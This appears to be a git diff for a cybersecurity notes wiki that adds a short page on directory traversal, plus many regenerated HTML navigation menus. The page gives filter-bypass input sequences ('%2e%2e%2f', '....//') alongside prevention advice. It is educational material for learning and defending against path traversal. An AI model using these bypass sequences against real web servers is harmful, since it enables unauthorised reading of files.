diff --git a/Notes/Exploitation/Web/Directory Traversal.md b/Notes/Exploitation/Web/Directory Traversal.md new file mode 100644 index 00000000..3a310499 --- /dev/null +++ b/Notes/Exploitation/Web/Directory Traversal.md @@ -0,0 +1,18 @@ +# Directory Traversal +A *directory traversal* (also known as *path traversal*) is a type of attack which allows an adversary to access files *outside* the web root directory and usually occurs when there is no proper user input sanitisation. + +If an application is vulnerable to path traversal, then one can abuse relative paths to escape from the web root and access arbitrary files on the file system. + +![](Resources/Images/Directory%20Traversal/Basic%20Directory%20Traversal.png) + +One should look for directory traversals anywhere that they see a filename - this can be in a URL parameter, in the URL path itself or in any additional resources that the application loads. + +# Filter Bypass +URL encoding can be used to bypass many filters which try to filter out the `../` sequence from user input because they literally look for this specific characters and not their URL representations. The URL encoding of the `.` character is `%2e` and the `/` character gets encoded to `%2f`. The whole sequence can therefore be represented as `%2e%2e%2f`. + +Some filters try to strip out the `../` sequence before handling requests. Oftentimes, however, these filters are *non-recursive* and only check the input once. Since the filter only goes over the string once and does not check the resulting string as well, the sequence `....//` will be changed to `../` after the middle `../` is removed. + +# Prevention +One should avoid passing user input to file system APIs entirely. If this is absolutely impossible to implement, then user input should be validated before processing. In the ideal case this should happen by comparing the input with a whitelist of permitted values. At the very least, one should verify that the user input contains only permitted characters such as alphanumeric ones. + +After such validation, the user input should be appended to the base directory and the file system API should be used canonicalise the resulting path. Ultimately, one should verify that this canonical path begins with the base directory. \ No newline at end of file diff --git a/Notes/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png b/Notes/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png new file mode 100644 index 00000000..8cd2889e Binary files /dev/null and b/Notes/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png differ diff --git a/Notes/SUMMARY.md b/Notes/SUMMARY.md index 46a8d525..4a6ec8eb 100644 --- a/Notes/SUMMARY.md +++ b/Notes/SUMMARY.md @@ -47,6 +47,7 @@ - [Cross-Site Scripting (XSS)](Exploitation/Web/Cross-Site%20Scripting%20(XSS).md) - [Cross-Site Request Forgery](Exploitation/Web/Cross-Site%20Request%20Forgery.md) - [WebSockets](Exploitation/Web/WebSockets.md) + - [Directory Traversal](Exploitation/Web/Directory%20Traversal.md) - [HTTP Parameter Pollution](Exploitation/Web/HTTP%20Parameter%20Pollution.md) - [Host Header Injection](Exploitation/Web/Host%20Header%20Injection.md) - [Windows](Exploitation/Windows/index.md) diff --git a/docs/404.html b/docs/404.html index 272ca737..5b58cc99 100644 --- a/docs/404.html +++ b/docs/404.html @@ -101,7 +101,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

- - diff --git a/docs/Cryptography/Breaking Classical Cryptrography.html b/docs/Cryptography/Breaking Classical Cryptrography.html index 0aa2e7c8..f7ef5034 100644 --- a/docs/Cryptography/Breaking Classical Cryptrography.html +++ b/docs/Cryptography/Breaking Classical Cryptrography.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -209,22 +209,6 @@

The - - diff --git a/docs/Cryptography/Computer Science Prerequisites.html b/docs/Cryptography/Computer Science Prerequisites.html index 57d7605f..02c0997b 100644 --- a/docs/Cryptography/Computer Science Prerequisites.html +++ b/docs/Cryptography/Computer Science Prerequisites.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
